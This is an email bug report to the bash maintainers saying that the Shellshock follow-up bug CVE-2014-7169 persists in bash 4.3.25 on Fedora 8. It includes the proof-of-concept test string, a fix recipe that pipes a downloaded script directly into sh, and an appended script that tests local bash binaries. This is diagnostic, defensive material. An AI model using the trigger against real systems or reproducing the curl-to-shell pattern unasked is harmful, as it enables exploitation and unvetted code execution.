
Exploit 2 (CVE-2014-7169)


From: Brady Cummings
Subject: Exploit 2 (CVE-2014-7169)
Date: Fri, 26 Sep 2014 11:27:27 -0500 (CDT)

Bash Maintainers,

Bash Version      :  GNU bash, version 4.3.25(2)-release (i686-pc-linux-gnu)
OS Version        :  Fedora release 8
Processor         :  Intel Atom D425 1.8GHz Single-core 
RAM               :  1GB
Compilation Flags :  Defaults (compiles fine)

Bug:  Exploit 2 (CVE-2014-7169) still exists in the 4.3.25(2) version when compiled in 
Fedora Core 8. 

Command : bash -version  ||  sh --version 
Results : 
          GNU bash, version 4.3.25(2)-release (i686-pc-linux-gnu)
          Copyright (C) 2013 Free Software Foundation, Inc.
          License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

          This is free software; you are free to change and redistribute it.
          There is NO WARRANTY, to the extent permitted by law.

Command : env X='() { (a)=>\' bash -c "echo date"; cat echo

Results : 
          bash: X: line 1: syntax error near unexpected token `='
          bash: X: line 1: `'
          bash: error importing function definition for `X'
          Fri Sep 26 11:05:55 CDT 2014

Recipe  : Based on script from https://shellshocker.net/

          curl https://shellshocker.net/fixbash | sh
          cp -f /usr/local/bin/bash /bin/bash
          sh --version
          env X='() { (a)=>\' bash -c "echo date"; cat echo

Thanks, 

Brady Cummings
Sr. Software Engineer 
CONTROL | CONNECT | IMPROVE 
TCS Basys Controls 2800 Laura Lane 
Middleton, WI 53562 
TOLLFREE: 800.288.9383 PH: 608.836.9034 Ext. 9180 FX: 608.836.9044 
www.tcsbasys.com 

Please consider the environment before printing this e-mail 
This message is for the named person's use only. You must not, directly or 
indirectly, use, disclose, distribute, print, or copy any part of this message 
if you are not the intended recipient.  © 2013 Temperature Control Specialties 
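
The test in the report drops a file named `echo` into the current directory, and the recipe replaces `/bin/bash` while the test resolves `bash` through `PATH`. The following is an added example, not part of the original message: it runs the same test string against each candidate binary in a throwaway directory and reports which ones create the file. The function names `check_bash` and `report_bash_binaries` and the list of candidate paths are assumptions.

```shell
#!/bin/sh
# Added example (not from the original report).
# check_bash PATH: run the report's CVE-2014-7169 test against one binary.
# Returns 0 if a file named "echo" is created (behaviour present),
#         1 if no file is created, 2 if PATH is not an executable.
check_bash() {
    bin=$1
    [ -x "$bin" ] || return 2
    # Throwaway directory so the stray "echo" file never lands in $PWD.
    tmp=$(mktemp -d) || return 2
    if (
        cd "$tmp" || exit 2
        # Same test string as in the report; its output is discarded.
        env X='() { (a)=>\' "$bin" -c "echo date" >/dev/null 2>&1 || true
        [ -e echo ]
    ); then
        rc=0
    else
        rc=$?
    fi
    rm -rf "$tmp"
    return "$rc"
}

# Check the paths the recipe touches plus whatever PATH resolves to.
# The same file may be listed twice if PATH points at one of the fixed paths.
report_bash_binaries() {
    for candidate in /bin/bash /usr/local/bin/bash \
                     "$(command -v bash)" "$(command -v sh)"; do
        [ -x "$candidate" ] || continue
        ver=$("$candidate" --version 2>/dev/null | head -n 1)
        if check_bash "$candidate"; then
            status="file 'echo' created (behaviour present)"
        else
            status="no file created"
        fi
        printf '%s\t%s\t%s\n' "$candidate" "${ver:-version unknown}" "$status"
    done
}

report_bash_binaries
```
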


